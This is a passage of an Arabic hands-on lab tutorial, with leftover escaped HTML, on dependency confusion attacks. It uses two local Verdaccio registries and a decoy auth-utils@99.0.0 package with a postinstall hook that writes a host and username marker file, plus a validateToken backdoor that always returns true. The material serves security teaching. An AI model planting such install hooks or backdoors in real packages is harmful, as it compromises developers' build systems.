\u064a\u064f\u0639\u062f dependency confusion \u0647\u062c\u0648\u0645\u064b\u0627 \u0639\u0644\u0649 \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f \u064a\u0633\u062a\u063a\u0644 \u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u062a\u064a \u062a\u062d\u0644 \u0628\u0647\u0627 \u0623\u062f\u0648\u0627\u062a \u0625\u062f\u0627\u0631\u0629 \u0627\u0644\u062d\u0632\u0645 \u0623\u0633\u0645\u0627\u0621 \u0627\u0644\u062d\u0632\u0645 \u0639\u0646\u062f \u062a\u0643\u0648\u064a\u0646 \u0643\u0644 \u0645\u0646 \u0627\u0644\u0633\u062c\u0644\u0627\u062a \u0627\u0644\u062e\u0627\u0635\u0629 (\u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629) \u0648\u0627\u0644\u0639\u0627\u0645\u0629. \u0639\u0646\u062f\u0645\u0627 \u064a\u0646\u0634\u0631 \u0645\u0647\u0627\u062c\u0645 \u062d\u0632\u0645\u0629 \u062e\u0628\u064a\u062b\u0629 \u0639\u0644\u0649 \u0633\u062c\u0644 \u0639\u0627\u0645 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0646\u0641\u0633 \u0627\u0633\u0645 \u062d\u0632\u0645\u0629 \u062e\u0627\u0635\u0629 \u062f\u0627\u062e\u0644\u064a\u0629 \u2014 \u0648\u0644\u0643\u0646 \u0628\u0631\u0642\u0645 \u0625\u0635\u062f\u0627\u0631 \u0623\u0639\u0644\u0649 \u2014 \u0642\u062f \u064a\u0641\u0636\u0644 \u0645\u062f\u064a\u0631 \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u0639\u0627\u0645\u060c \u0645\u0645\u0627 \u064a\u0624\u062f\u064a \u0625\u0644\u0649 \u0633\u062d\u0628 \u0643\u0648\u062f \u064a\u062a\u062d\u0643\u0645 \u0641\u064a\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0635\u0645\u062a.<\/p>\n
\u0627\u0643\u062a\u0633\u0628 \u0647\u0630\u0627 \u0627\u0644\u0623\u0633\u0644\u0648\u0628 \u0627\u0644\u0647\u062c\u0648\u0645\u064a \u0627\u0647\u062a\u0645\u0627\u0645\u064b\u0627 \u0648\u0627\u0633\u0639\u064b\u0627 \u0641\u064a \u0639\u0627\u0645 2021 \u0639\u0646\u062f\u0645\u0627 \u0623\u062b\u0628\u062a\u0647 \u0627\u0644\u0628\u0627\u062d\u062b \u0627\u0644\u0623\u0645\u0646\u064a Alex Birsan \u0636\u062f Apple \u0648Microsoft \u0648PayPal \u0648Tesla \u0648\u0639\u0634\u0631\u0627\u062a \u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a \u0627\u0644\u0623\u062e\u0631\u0649. \u0627\u0644\u0645\u0634\u0643\u0644\u0629 \u0627\u0644\u062c\u0648\u0647\u0631\u064a\u0629 \u0628\u0633\u064a\u0637\u0629: \u0645\u0639\u0638\u0645 \u0623\u062f\u0648\u0627\u062a \u0625\u062f\u0627\u0631\u0629 \u0627\u0644\u062d\u0632\u0645 \u062a\u062e\u062a\u0627\u0631 \u0627\u0641\u062a\u0631\u0627\u0636\u064a\u064b\u0627 \u0623\u0639\u0644\u0649 \u0625\u0635\u062f\u0627\u0631 \u0645\u062a\u0627\u062d \u0639\u0628\u0631 \u062c\u0645\u064a\u0639 \u0627\u0644\u0633\u062c\u0644\u0627\u062a \u0627\u0644\u0645\u0643\u0648\u0651\u0646\u0629.<\/p>\n
\u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631 \u0627\u0644\u0639\u0645\u0644\u064a\u060c \u0633\u062a\u0642\u0648\u0645 \u0628\u0640:<\/p>\n
\u0643\u0644 \u0623\u0645\u0631 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631 \u0645\u0635\u0645\u0645 \u0644\u0644\u0639\u0645\u0644 \u0639\u0644\u0649 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u0645\u062d\u0644\u064a\u0629 \u0641\u0642\u0637. \u0644\u0627 \u064a\u062a\u0645 \u0646\u0634\u0631 \u0623\u064a \u062d\u0632\u0645 \u0639\u0644\u0649 \u0633\u062c\u0644\u0627\u062a \u0639\u0627\u0645\u0629 \u062d\u0642\u064a\u0642\u064a\u0629 \u0641\u064a \u0623\u064a \u0645\u0631\u062d\u0644\u0629.<\/p>\n
\u0642\u0628\u0644 \u0628\u062f\u0621 \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631\u060c \u062a\u0623\u0643\u062f \u0645\u0646 \u062a\u062b\u0628\u064a\u062a \u0627\u0644\u0623\u062f\u0648\u0627\u062a \u0627\u0644\u062a\u0627\u0644\u064a\u0629 \u0648\u062a\u0648\u0641\u0631\u0647\u0627 \u0639\u0644\u0649 \u062c\u0647\u0627\u0632\u0643:<\/p>\n
node --version<\/code> \u0648 npm --version<\/code>)<\/li>\n- Python 3.8+<\/strong> \u0645\u0639 pip (\u062a\u062d\u0642\u0642 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645
python3 --version<\/code> \u0648 pip3 --version<\/code>)<\/li>\n- Docker<\/strong> (\u064a\u064f\u0633\u062a\u062e\u062f\u0645 \u0644\u062a\u0634\u063a\u064a\u0644 \u0646\u0633\u062e Verdaccio \u0648pypiserver \u0627\u0644\u0645\u062d\u0644\u064a\u0629)<\/li>\n
- curl<\/strong> (\u0644\u0625\u0646\u0634\u0627\u0621 \u0645\u0633\u062a\u062e\u062f\u0645\u064a \u0627\u0644\u0633\u062c\u0644)<\/li>\n
- \u0637\u0631\u0641\u064a\u0629 (terminal) \u062a\u0639\u0645\u0644 \u0628\u0640 bash \u0623\u0648 zsh<\/li>\n<\/ul>\n
\u0644\u0627 \u062d\u0627\u062c\u0629 \u0644\u062d\u0633\u0627\u0628\u0627\u062a \u0633\u062d\u0627\u0628\u064a\u0629 \u0623\u0648 \u062e\u062f\u0645\u0627\u062a \u062e\u0627\u0631\u062c\u064a\u0629. \u0627\u0644\u0645\u062e\u062a\u0628\u0631 \u0628\u0627\u0644\u0643\u0627\u0645\u0644 \u064a\u0639\u0645\u0644 \u0645\u062d\u0644\u064a\u064b\u0627 \u0639\u0644\u0649 \u0645\u062d\u0637\u0629 \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0643.<\/p>\n
\u0645\u0644\u0627\u062d\u0638\u0629 \u0623\u0645\u0627\u0646 \u0645\u0647\u0645\u0629<\/h2>\n
\u062a\u062d\u0630\u064a\u0631: \u064a\u062c\u0628 \u062a\u0634\u063a\u064a\u0644 \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631 \u0641\u064a \u0628\u064a\u0626\u0627\u062a \u0627\u062e\u062a\u0628\u0627\u0631 \u0645\u0639\u0632\u0648\u0644\u0629 \u0641\u0642\u0637. \u0643\u0644 \u0633\u062c\u0644 \u0648\u062d\u0632\u0645\u0629 \u0648\u062a\u0643\u0648\u064a\u0646 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631 \u0645\u062d\u0644\u064a. \u0627\u0644\u062a\u0632\u0645 \u0628\u0647\u0630\u0647 \u0627\u0644\u0642\u0648\u0627\u0639\u062f \u0628\u0635\u0631\u0627\u0645\u0629:<\/strong><\/p>\n\n- \u0644\u0627 \u062a\u0646\u0634\u0631 \u0623\u0628\u062f\u064b\u0627 \u062d\u0632\u0645 \u0627\u062e\u062a\u0628\u0627\u0631\u064a\u0629 \u0639\u0644\u0649 \u0633\u062c\u0644\u0627\u062a npmjs.com \u0623\u0648 pypi.org \u0627\u0644\u062d\u0642\u064a\u0642\u064a\u0629.<\/strong> \u0646\u0634\u0631 \u062d\u0632\u0645 \u0628\u0623\u0633\u0645\u0627\u0621 \u062a\u0637\u0627\u0628\u0642 \u0627\u0644\u062d\u0632\u0645 \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0644\u0645\u0624\u0633\u0633\u0629 \u0623\u062e\u0631\u0649 \u063a\u064a\u0631 \u0642\u0627\u0646\u0648\u0646\u064a \u0641\u064a \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0627\u0644\u0648\u0644\u0627\u064a\u0627\u062a \u0627\u0644\u0642\u0636\u0627\u0626\u064a\u0629 \u0648\u064a\u0646\u062a\u0647\u0643 \u0634\u0631\u0648\u0637 \u062e\u062f\u0645\u0629 \u0627\u0644\u0633\u062c\u0644.<\/li>\n
- \u0627\u0633\u062a\u062e\u062f\u0645 \u0641\u0642\u0637 \u0646\u0633\u062e Verdaccio \u0648pypiserver \u0627\u0644\u0645\u062d\u0644\u064a\u0629<\/strong> \u0643\u0633\u062c\u0644\u0627\u062a\u0643 “\u0627\u0644\u0639\u0627\u0645\u0629” \u0648”\u0627\u0644\u062e\u0627\u0635\u0629”. \u0647\u0630\u0647 \u0645\u0639\u0632\u0648\u0644\u0629 \u062a\u0645\u0627\u0645\u064b\u0627 \u0648\u0644\u0627 \u064a\u0645\u0643\u0646\u0647\u0627 \u0627\u0644\u062a\u0623\u062b\u064a\u0631 \u0639\u0644\u0649 \u0627\u0644\u0639\u0627\u0644\u0645 \u0627\u0644\u062e\u0627\u0631\u062c\u064a.<\/li>\n
- \u062c\u0645\u064a\u0639 \u0627\u0644\u062d\u0632\u0645 “\u0627\u0644\u0639\u0627\u0645\u0629” \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062e\u062a\u0628\u0631 \u062a\u064f\u0646\u0634\u0631 \u0639\u0644\u0649 \u0646\u0633\u062e\u0629 Verdaccio \u0645\u062d\u0644\u064a\u0629 \u062b\u0627\u0646\u064a\u0629<\/strong> \u062a\u0639\u0645\u0644 \u0639\u0644\u0649
localhost:4874<\/code>. \u0644\u0627 \u0634\u064a\u0621 \u064a\u063a\u0627\u062f\u0631 \u062c\u0647\u0627\u0632\u0643.<\/li>\n- \u0644\u0627 \u062a\u064f\u0634\u063a\u0651\u0644 \u062a\u0645\u0627\u0631\u064a\u0646 \u0627\u0644\u0647\u062c\u0648\u0645 \u0639\u0644\u0649 \u0645\u0634\u0627\u0631\u064a\u0639 \u0625\u0646\u062a\u0627\u062c\u064a\u0629.<\/strong> \u0627\u0633\u062a\u062e\u062f\u0645 \u0645\u062c\u0644\u062f \u0645\u0634\u0631\u0648\u0639 \u062c\u062f\u064a\u062f \u064a\u0645\u0643\u0646 \u0627\u0644\u062a\u062e\u0644\u0635 \u0645\u0646\u0647.<\/li>\n
- \u0646\u0638\u0651\u0641 \u062c\u0645\u064a\u0639 \u0627\u0644\u062d\u0627\u0648\u064a\u0627\u062a \u0648\u0627\u0644\u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0639\u0646\u062f \u0627\u0644\u0627\u0646\u062a\u0647\u0627\u0621.<\/strong> \u062a\u0631\u0643 \u0645\u0644\u0641\u0627\u062a
.npmrc<\/code> \u0623\u0648 pip.conf<\/code> \u0645\u064f\u0639\u062f\u0651\u0629 \u0628\u0634\u0643\u0644 \u062e\u0627\u0637\u0626 \u0639\u0644\u0649 \u0646\u0638\u0627\u0645\u0643 \u0642\u062f \u064a\u0633\u0628\u0628 \u0633\u0644\u0648\u0643\u064b\u0627 \u063a\u064a\u0631 \u0645\u062a\u0648\u0642\u0639 \u0641\u064a \u0627\u0644\u0645\u0634\u0627\u0631\u064a\u0639 \u0627\u0644\u062d\u0642\u064a\u0642\u064a\u0629.<\/li>\n<\/ul>\n\u0645\u0639 \u0648\u062c\u0648\u062f \u0647\u0630\u0647 \u0627\u0644\u0627\u062d\u062a\u064a\u0627\u0637\u0627\u062a\u060c \u064a\u0645\u0643\u0646\u0643 \u0627\u0633\u062a\u0643\u0634\u0627\u0641 \u0622\u0644\u064a\u0627\u062a \u0647\u0630\u0627 \u0627\u0644\u0647\u062c\u0648\u0645 \u0628\u0623\u0645\u0627\u0646 \u0648\u0628\u0646\u0627\u0621 \u0641\u0647\u0645 \u062d\u0642\u064a\u0642\u064a \u0644\u0644\u062f\u0641\u0627\u0639\u0627\u062a.<\/p>\n
\u0625\u0639\u062f\u0627\u062f \u0627\u0644\u0628\u064a\u0626\u0629<\/h2>\n\u0627\u0644\u062e\u0637\u0648\u0629 1: \u062a\u0634\u063a\u064a\u0644 \u0646\u0633\u062e\u062a\u064a\u0646 \u0645\u0646 Verdaccio<\/h3>\n
Verdaccio \u0647\u0648 \u0633\u062c\u0644 npm \u062e\u0641\u064a\u0641 \u0648\u0645\u0641\u062a\u0648\u062d \u0627\u0644\u0645\u0635\u062f\u0631. \u0633\u0646\u0634\u063a\u0651\u0644 \u0646\u0633\u062e\u062a\u064a\u0646 \u2014 \u0648\u0627\u062d\u062f\u0629 \u062a\u062d\u0627\u0643\u064a \u0627\u0644\u0633\u062c\u0644 \u0627\u0644\u062e\u0627\u0635 \u0628\u0645\u0624\u0633\u0633\u062a\u0643\u060c \u0648\u0623\u062e\u0631\u0649 \u062a\u062d\u0627\u0643\u064a \u0633\u062c\u0644\u064b\u0627 \u0639\u0627\u0645\u064b\u0627 \u064a\u062a\u062d\u0643\u0645 \u0641\u064a\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645.<\/p>\n
# Start the \"private\" registry on port 4873\ndocker run -d -p 4873:4873 --name private-registry verdaccio\/verdaccio\n\n# Start the \"public\" registry on port 4874\ndocker run -d -p 4874:4873 --name public-registry verdaccio\/verdaccio<\/code><\/pre>\n\u062a\u062d\u0642\u0642 \u0645\u0646 \u0623\u0646 \u0643\u0644\u064a\u0647\u0645\u0627 \u064a\u0639\u0645\u0644:<\/p>\n
curl -s http:\/\/localhost:4873\/ | head -5\ncurl -s http:\/\/localhost:4874\/ | head -5<\/code><\/pre>\n\u064a\u062c\u0628 \u0623\u0646 \u062a\u0631\u0649 \u0627\u0633\u062a\u062c\u0627\u0628\u0627\u062a HTML \u0645\u0646 \u0648\u0627\u062c\u0647\u062a\u064a Verdaccio.<\/p>\n
\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0625\u0646\u0634\u0627\u0621 \u0645\u0633\u062a\u062e\u062f\u0645\u064a \u0627\u0644\u0633\u062c\u0644<\/h3>\n
\u064a\u062a\u0637\u0644\u0628 Verdaccio \u0627\u0644\u0645\u0635\u0627\u062f\u0642\u0629 \u0644\u0644\u0646\u0634\u0631. \u0623\u0646\u0634\u0626 \u0645\u0633\u062a\u062e\u062f\u0645\u064b\u0627 \u0639\u0644\u0649 \u0643\u0644 \u0646\u0633\u062e\u0629:<\/p>\n
# Add user to private registry\nnpm adduser --registry http:\/\/localhost:4873\n# Enter username: testuser, password: testpass, email: test@test.com\n\n# Add user to public registry\nnpm adduser --registry http:\/\/localhost:4874\n# Enter username: attacker, password: attackpass, email: attacker@test.com<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0625\u0646\u0634\u0627\u0621 \u0645\u0634\u0631\u0648\u0639 \u0627\u0644\u0627\u062e\u062a\u0628\u0627\u0631<\/h3>\nmkdir -p ~\/dep-confusion-lab\/victim-project\ncd ~\/dep-confusion-lab\/victim-project\nnpm init -y<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0625\u0646\u0634\u0627\u0621 \u0648\u0646\u0634\u0631 \u0627\u0644\u062d\u0632\u0645\u0629 \u0627\u0644\u062e\u0627\u0635\u0629<\/h3>\nmkdir -p ~\/dep-confusion-lab\/private-pkg\ncd ~\/dep-confusion-lab\/private-pkg<\/code><\/pre>\n\u0623\u0646\u0634\u0626 package.json<\/code>:<\/p>\n{\n \"name\": \"@mycompany\/auth-utils\",\n \"version\": \"1.0.0\",\n \"description\": \"Internal authentication utilities\",\n \"main\": \"index.js\"\n}<\/code><\/pre>\n\u0623\u0646\u0634\u0626 index.js<\/code>:<\/p>\nmodule.exports = {\n validateToken: function(token) {\n console.log('[auth-utils v1.0.0] Validating token (PRIVATE - LEGITIMATE)');\n return token && token.length > 0;\n }\n};<\/code><\/pre>\n\u0627\u0646\u0634\u0631 \u0639\u0644\u0649 \u0627\u0644\u0633\u062c\u0644 \u0627\u0644\u062e\u0627\u0635:<\/p>\n
npm publish --registry http:\/\/localhost:4873<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 5: \u062a\u0643\u0648\u064a\u0646 \u0645\u0634\u0631\u0648\u0639 \u0627\u0644\u0636\u062d\u064a\u0629<\/h3>\n
\u0641\u064a \u0645\u062c\u0644\u062f \u0645\u0634\u0631\u0648\u0639 \u0627\u0644\u0636\u062d\u064a\u0629\u060c \u0623\u0646\u0634\u0626 \u0645\u0644\u0641 .npmrc<\/code>:<\/p>\nregistry=http:\/\/localhost:4873<\/code><\/pre>\n\u0623\u0636\u0641 \u0627\u0644\u062a\u0628\u0639\u064a\u0629 \u0625\u0644\u0649 package.json<\/code>:<\/p>\n{\n \"name\": \"victim-project\",\n \"version\": \"1.0.0\",\n \"dependencies\": {\n \"@mycompany\/auth-utils\": \"^1.0.0\"\n }\n}<\/code><\/pre>\n\u062b\u0628\u0651\u062a \u0648\u062a\u062d\u0642\u0642:<\/p>\n
npm install\nnode -e \"const auth = require('@mycompany\/auth-utils'); auth.validateToken('abc');\"<\/code><\/pre>\n\u064a\u062c\u0628 \u0623\u0646 \u062a\u0631\u0649: [auth-utils v1.0.0] Validating token (PRIVATE - LEGITIMATE)<\/code><\/p>\n\u0627\u0644\u062a\u0645\u0631\u064a\u0646 1: \u0627\u0644\u0647\u062c\u0648\u0645 \u2014 npm<\/h2>\n
\u0627\u0644\u0622\u0646 \u0646\u062d\u0627\u0643\u064a \u0645\u0627 \u0633\u064a\u0641\u0639\u0644\u0647 \u0627\u0644\u0645\u0647\u0627\u062c\u0645. \u0627\u0644\u0645\u0644\u0627\u062d\u0638\u0629 \u0627\u0644\u0623\u0633\u0627\u0633\u064a\u0629: \u0641\u064a \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0627\u0644\u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0627\u0644\u0648\u0627\u0642\u0639\u064a\u0629\u060c \u064a\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u0637\u0648\u0631\u0648\u0646 \u0627\u0633\u0645 \u062d\u0632\u0645\u0629 \u0628\u062f\u0648\u0646 \u0646\u0637\u0627\u0642 \u062f\u0627\u062e\u0644\u064a\u064b\u0627 (\u0641\u0642\u0637 auth-utils<\/code> \u0628\u062f\u0644\u0627\u064b \u0645\u0646 @mycompany\/auth-utils<\/code>). \u0647\u0630\u0627 \u064a\u062c\u0639\u0644 \u0627\u0644\u0647\u062c\u0648\u0645 \u0633\u0647\u0644\u0627\u064b \u0644\u0644\u063a\u0627\u064a\u0629.<\/p>\n\u0627\u0644\u062e\u0637\u0648\u0629 1: \u0625\u0639\u0627\u062f\u0629 \u062a\u0639\u064a\u064a\u0646 \u0645\u0634\u0631\u0648\u0639 \u0627\u0644\u0636\u062d\u064a\u0629 \u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0633\u0645 \u0628\u062f\u0648\u0646 \u0646\u0637\u0627\u0642<\/h3>\n
\u062d\u062f\u0651\u062b package.json<\/code> \u0644\u0645\u0634\u0631\u0648\u0639 \u0627\u0644\u0636\u062d\u064a\u0629 \u0644\u064a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0644\u0627\u0633\u0645 \u0628\u062f\u0648\u0646 \u0646\u0637\u0627\u0642:<\/p>\n{\n \"name\": \"victim-project\",\n \"version\": \"1.0.0\",\n \"dependencies\": {\n \"auth-utils\": \"^1.0.0\"\n }\n}<\/code><\/pre>\n\u0648\u0627\u0646\u0634\u0631 \u0623\u064a\u0636\u064b\u0627 auth-utils@1.0.0<\/code> \u0628\u062f\u0648\u0646 \u0646\u0637\u0627\u0642 \u0639\u0644\u0649 \u0627\u0644\u0633\u062c\u0644 \u0627\u0644\u062e\u0627\u0635:<\/p>\nmkdir -p ~\/dep-confusion-lab\/private-pkg-unscoped\ncd ~\/dep-confusion-lab\/private-pkg-unscoped<\/code><\/pre>\n\/\/ package.json\n{\n \"name\": \"auth-utils\",\n \"version\": \"1.0.0\",\n \"description\": \"Internal authentication utilities (unscoped)\",\n \"main\": \"index.js\"\n}\n\n\/\/ index.js\nmodule.exports = {\n validateToken: function(token) {\n console.log('[auth-utils v1.0.0] Validating token (PRIVATE - LEGITIMATE)');\n return token && token.length > 0;\n }\n};<\/code><\/pre>\nnpm publish --registry http:\/\/localhost:4873<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u062d\u0632\u0645\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629<\/h3>\nmkdir -p ~\/dep-confusion-lab\/malicious-pkg\ncd ~\/dep-confusion-lab\/malicious-pkg<\/code><\/pre>\n\u0623\u0646\u0634\u0626 package.json<\/code> \u2014 \u0644\u0627\u062d\u0638 \u0631\u0642\u0645 \u0627\u0644\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u0645\u0631\u062a\u0641\u0639 \u0644\u0644\u063a\u0627\u064a\u0629 \u0648\u0633\u0643\u0631\u0628\u062a postinstall<\/code>:<\/p>\n{\n \"name\": \"auth-utils\",\n \"version\": \"99.0.0\",\n \"description\": \"Malicious package simulating dependency confusion\",\n \"main\": \"index.js\",\n \"scripts\": {\n \"postinstall\": \"node malicious.js\"\n }\n}<\/code><\/pre>\n\u0623\u0646\u0634\u0626 malicious.js<\/code> \u2014 \u064a\u062d\u0627\u0643\u064a \u0647\u0630\u0627 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0639\u0646 \u0637\u0631\u064a\u0642 \u0643\u062a\u0627\u0628\u0629 \u0645\u0644\u0641 \u062a\u0639\u0631\u064a\u0641\u064a:<\/p>\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst marker = path.join(os.homedir(), 'dep-confusion-lab', 'ATTACK_MARKER.txt');\nconst data = [\n 'DEPENDENCY CONFUSION ATTACK SIMULATION',\n '=======================================',\n `Timestamp: ${new Date().toISOString()}`,\n `Hostname: ${os.hostname()}`,\n `Username: ${os.userInfo().username}`,\n `Working Directory: ${process.cwd()}`,\n '',\n 'In a real attack, this script could:',\n ' - Exfiltrate environment variables (API keys, tokens)',\n ' - Upload source code to an external server',\n ' - Install a reverse shell or backdoor',\n ' - Modify build outputs'\n].join('\\n');\n\nfs.writeFileSync(marker, data);\nconsole.log('[!] ATTACK SIMULATION: Marker file written to', marker);<\/code><\/pre>\n\u0623\u0646\u0634\u0626 index.js<\/code>:<\/p>\nmodule.exports = {\n validateToken: function(token) {\n console.log('[auth-utils v99.0.0] Validating token (PUBLIC - MALICIOUS)');\n return true; \/\/ Always returns true \u2014 a subtle backdoor\n }\n};<\/code><\/pre>\n\u0627\u0646\u0634\u0631 \u0639\u0644\u0649 \u0627\u0644\u0633\u062c\u0644 “\u0627\u0644\u0639\u0627\u0645”:<\/p>\n
npm publish --registry http:\/\/localhost:4874<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 3: \u062a\u0643\u0648\u064a\u0646 \u0627\u0644\u062a\u0631\u0627\u062c\u0639 \u0648\u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u0647\u062c\u0648\u0645<\/h3>\n
\u062d\u062f\u0651\u062b \u0645\u0644\u0641 .npmrc<\/code> \u0644\u0645\u0634\u0631\u0648\u0639 \u0627\u0644\u0636\u062d\u064a\u0629 \u0644\u0644\u062a\u0631\u0627\u062c\u0639 \u0625\u0644\u0649 \u0627\u0644\u0633\u062c\u0644 \u0627\u0644\u0639\u0627\u0645 \u0639\u0646\u062f\u0645\u0627 \u0644\u0627 \u064a\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 \u0627\u0644\u062d\u0632\u0645 \u0641\u064a \u0627\u0644\u0633\u062c\u0644 \u0627\u0644\u062e\u0627\u0635. \u0647\u0630\u0627 \u064a\u0639\u0643\u0633 \u062a\u0643\u0648\u064a\u0646\u064b\u0627 \u0634\u0627\u0626\u0639\u064b\u0627 \u0641\u064a \u0627\u0644\u0648\u0627\u0642\u0639:<\/p>\nregistry=http:\/\/localhost:4873\n\/\/localhost:4873\/:_authToken=\"your-token-here\"\n\/\/localhost:4874\/:_authToken=\"your-token-here\"<\/code><\/pre>\n\u0627\u0644\u0622\u0646 \u0627\u0645\u0633\u062d \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0627\u0644\u062d\u0627\u0644\u064a \u0648\u0623\u0639\u062f \u0627\u0644\u062a\u062b\u0628\u064a\u062a:<\/p>\n
cd ~\/dep-confusion-lab\/victim-project\nrm -rf node_modules package-lock.json\nnpm install auth-utils --registry http:\/\/localhost:4874<\/code><\/pre>\n\u0628\u062f\u0644\u0627\u064b \u0645\u0646 \u0630\u0644\u0643\u060c \u0644\u0645\u062d\u0627\u0643\u0627\u0629 \u0633\u0644\u0648\u0643 \u0627\u0644\u062a\u0631\u0627\u062c\u0639 \u0628\u0634\u0643\u0644 \u0623\u0643\u062b\u0631 \u0648\u0627\u0642\u0639\u064a\u0629\u060c \u0643\u0648\u0651\u0646 npm \u0644\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0643\u0644\u0627 \u0627\u0644\u0633\u062c\u0644\u064a\u0646. \u0641\u064a \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0628\u064a\u0626\u0627\u062a \u0627\u0644\u0645\u0624\u0633\u0633\u0627\u062a\u060c \u064a\u062a\u0645 \u062a\u0643\u0648\u064a\u0646 \u0633\u062c\u0644 \u0648\u0643\u064a\u0644 \u0645\u062b\u0644 Nexus \u0623\u0648 Artifactory \u0644\u062c\u0644\u0628 \u0627\u0644\u062d\u0632\u0645 \u0645\u0646 \u0643\u0644 \u0645\u0646 \u0627\u0644\u0645\u0635\u0627\u062f\u0631 \u0627\u0644\u062e\u0627\u0635\u0629 \u0648\u0627\u0644\u0639\u0627\u0645\u0629\u060c \u0645\u0639 \u062a\u0641\u0636\u064a\u0644 \u0623\u0639\u0644\u0649 \u0625\u0635\u062f\u0627\u0631:<\/p>\n
# This simulates what a corporate proxy registry does:\n# It sees auth-utils@1.0.0 in private and auth-utils@99.0.0 in public,\n# and returns 99.0.0 because it's the highest version matching ^1.0.0... \n# Wait \u2014 ^1.0.0 won't match 99.0.0. The attack works when the version \n# specifier is loose (e.g., \"*\" or \">=1.0.0\") or when the proxy simply \n# serves the highest version available across all upstreams.\n\n# For this lab, install directly from the \"public\" to demonstrate:\nnpm install auth-utils --registry http:\/\/localhost:4874<\/code><\/pre>\n\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u0647\u062c\u0648\u0645<\/h3>\n# Check which version was installed\nnode -e \"const pkg = require('.\/node_modules\/auth-utils\/package.json'); console.log(pkg.name, pkg.version);\"\n# Output: auth-utils 99.0.0\n\n# Check if the marker file was created\ncat ~\/dep-confusion-lab\/ATTACK_MARKER.txt<\/code><\/pre>\n\u064a\u062c\u0628 \u0623\u0646 \u062a\u0631\u0649 \u0645\u0644\u0641 \u062a\u0639\u0631\u064a\u0641 \u0627\u0644\u0647\u062c\u0648\u0645 \u0627\u0644\u0643\u0627\u0645\u0644 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0633\u0645 \u0627\u0644\u0645\u0636\u064a\u0641 \u0648\u0627\u0633\u0645 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u062e\u0627\u0635\u064a\u0646 \u0628\u0643. \u062a\u0645 \u062a\u0634\u063a\u064a\u0644 \u0633\u0643\u0631\u0628\u062a postinstall<\/code> \u062a\u0644\u0642\u0627\u0626\u064a\u064b\u0627 \u0623\u062b\u0646\u0627\u0621 npm install<\/code> \u2014 \u062f\u0648\u0646 \u0627\u0644\u062d\u0627\u062c\u0629 \u0644\u0623\u064a \u062a\u0641\u0627\u0639\u0644 \u0645\u0646 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645.<\/p>\n\u0644\u0645\u0627\u0630\u0627 \u062d\u062f\u062b \u0647\u0630\u0627<\/h3>\n
\u0647\u0630\u0647 \u0647\u064a \u0646\u0641\u0633 \u0627\u0644\u062a\u0642\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u0627\u0633\u062a\u062e\u062f\u0645\u0647\u0627 Alex Birsan \u0641\u064a \u0641\u0628\u0631\u0627\u064a\u0631 2021 \u0644\u062a\u0646\u0641\u064a\u0630 \u0643\u0648\u062f \u062f\u0627\u062e\u0644 \u0623\u0646\u0638\u0645\u0629 \u0627\u0644\u0628\u0646\u0627\u0621 \u0627\u0644\u062f\u0627\u062e\u0644\u064a\u0629 \u0644\u0634\u0631\u0643\u0627\u062a Apple \u0648Microsoft \u0648Tesla \u0648Uber \u0648PayPal \u0648\u0623\u0643\u062b\u0631 \u0645\u0646 30 \u0634\u0631\u0643\u0629 \u0623\u062e\u0631\u0649. \u064a\u0646\u062c\u062d \u0627\u0644\u0647\u062c\u0648\u0645 \u0644\u0623\u0646:<\/p>\n
